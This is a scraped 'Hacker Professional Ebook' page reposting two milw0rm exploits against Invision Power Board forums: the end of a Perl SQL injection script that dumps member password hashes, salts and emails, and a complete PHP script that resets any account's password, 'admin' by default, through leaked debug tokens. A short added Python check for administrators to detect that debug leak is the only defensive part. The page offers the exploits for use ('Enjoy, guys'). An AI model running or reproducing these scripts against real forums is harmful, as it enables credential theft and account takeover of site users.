Hacker Professional Ebook part 386 pps


$own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";

query($own_query,$server,$dir);

if(length($rep)==5)

{

$salt = $rep;

$own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";

query($own_query,$server,$dir);

if(length($rep)>0) {

$email = $rep;

print RES $id.":".$hash.":".$salt."::".$email."\n"; }

} }

}

close(RES);

print "[!] Query was successfully perfomed Results are in txt files\r\n";

&footer();

$ex = <STDIN>;

sub footer()

{

print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";

print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";

}

sub header()

{

print q(

-

* Invision Power Board 2.1.* Remote SQL Injecton Exploit *

* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *

* Coded by w4g.not null *

* FOR EDUCATIONAL PURPOSES *ONLY* *

-

);

}

sub info()

{

print q(

[i] Usage: perl w4gipb216.pl [server] [/dir/]

where

|- server - server, where IPB installed without http://

|- /dir/ - dir, where IPB installed or / for no dir

e.g perl w4gipb216.pl someserver.com /forum/

[i] Stealing info about users (format id:pass:salt::email)

[!] Need MySQL > 4.0

);

}

sub query()

{

my($q,$server,$dir) = @_;

$res =

$ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'

=>"' ".$q);

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }

else

if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }

}

}

return $rep;

}

# milw0rm.com [2006-07-18]

langtuhaohoa(HCE)

Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

Quote:

<?php

/*

Debug Mode password change vulnerability

Affects Invision Power Board 2.0.0 to 2.1.7

by Rapigator

This works if:

"Debug Level" is set to 3

or

Enable SQL Debug Mode is turned on

In General Configuration of the forum software

*/

// The forum's address up to and including 'index.php'

$site = "http://localhost/forums/index.php";

// An existing user's login name

$name = "admin";

// The new password(3-32 characters)

$pass = "1234";

// You can use a proxy

// $proxy = "1.2.3.4:8080";

// -

$site = "?";

$suffix = "";

$name = urlencode($name);

$pass = urlencode($pass);

$curl = curl_init($site.'act=Reg&CODE=10');

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span

class=\'purple\'>([\\w]*?)_reg_antispam<\/span>

\\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page,

$regs)) {

$prefix = $regs[1];

$regid = $regs[2];

$regcode = $regs[3];

} else {

$suffix = "&debug=1";

$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam

\\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page,

$regs)) {

$prefix = $regs[1];

$regid = $regs[2];

$regcode = $regs[3];

}

}

if (!isset($regid) || !isset($regcode)) {

echo "Error: Probably not vulnerable, or no forum found";

exit;

}

$curl = curl_init($site.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_POST, 1);

curl_setopt($curl, CURLOPT_POSTFIELDS,

"act=Reg&CODE=11&member_name={$name}&regid={$regid

}&reg_code={$regcode}");

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span

class=\'purple\'>'.$prefix.'_validating<\/span>

\\(vid,member_id,real_group,temp_group,entry_date,

coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/',

$page, $regs)) {

change_pass($regcode,$regid,$regs[1],$regs[2]);

}

if (preg_match('/INSERT INTO '.$prefix.'_validating

\\(vid,member_id,real_group,temp_group,entry_date,

coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/',

$page, $regs)) {

change_pass($regcode,$regid,$regs[1],$regs[2]);

}

function change_pass($regcode,$regid,$vid,$userid) {

global $site, $proxy, $name, $pass;

$curl = curl_init($site.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_POST, 1);

curl_setopt($curl, CURLOPT_POSTFIELDS,

"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={

$vid}&regid={$regid}&reg_code={$regcode}&pass1={$p

ass}&pass2={$pass}");

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

echo "Password Changed!";

exit;

}

?>

# milw0rm.com [2006-11-01]

Enjoy, guys

Navaro(HCE)
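
An added example, not part of the original post and not Invision Power Board code: a check an administrator can run over a saved response body from their own forum to see whether SQL debug output exposes the registration and lost-password tokens that the script above reads. The table and column names come from the script's patterns; the `ibf` prefix, the sample HTML and the function name are assumptions made for illustration.

```python
import html
import re

# Columns that act as secrets in the two statements the script above matches.
SECRET_COLUMNS = {"regid", "regcode", "vid"}

_TAG = re.compile(r"<[^>]+>")
# INSERT into <prefix>_reg_antispam or <prefix>_validating, as printed by debug mode.
_INSERT = re.compile(
    r"INSERT\s+INTO\s+(\w*?)_(reg_antispam|validating)\s*\(([^)]*)\)\s*VALUES\s*\(",
    re.IGNORECASE,
)


def find_debug_leaks(body):
    """Return one finding per leaked statement: table and secret columns, never values."""
    # Debug output wraps keywords and table names in <span> tags; strip them first.
    text = html.unescape(_TAG.sub("", body))
    findings = []
    for match in _INSERT.finditer(text):
        prefix, table, cols = match.groups()
        columns = [c.strip().lower() for c in cols.split(",")]
        findings.append({
            "table": f"{prefix}_{table}",
            "secret_columns": [c for c in columns if c in SECRET_COLUMNS],
        })
    return findings


# Constructed sample of a debug-enabled response (prefix "ibf" and all values are made up).
SAMPLE_DEBUG = (
    "<div><span class='green'>INSERT</span> INTO <span class='purple'>ibf_reg_antispam</span> "
    "(regid,regcode,ip_address,ctime) VALUES('" + "a" * 32 + "',123456,'192.0.2.10',1162339200)"
    "</div><div>INSERT INTO ibf_validating (vid,member_id,real_group,temp_group,entry_date,"
    "coppa_user,lost_pass,ip_address) VALUES('" + "b" * 32 + "',1,4,4,1162339200,0,1,'192.0.2.10')</div>"
)
# Constructed sample of a response with debug output disabled.
SAMPLE_CLEAN = "<html><body><form>Lost password form</form></body></html>"

if __name__ == "__main__":
    for name, body in (("debug", SAMPLE_DEBUG), ("clean", SAMPLE_CLEAN)):
        leaks = find_debug_leaks(body)
        print(name, "EXPOSED" if leaks else "ok", leaks)
```

A non-empty result means "Debug Level" 3 or SQL Debug Mode is still printing these statements to visitors and should be turned off in General Configuration.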

iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability

Code:

Posted: 04/07/2014, 12:20
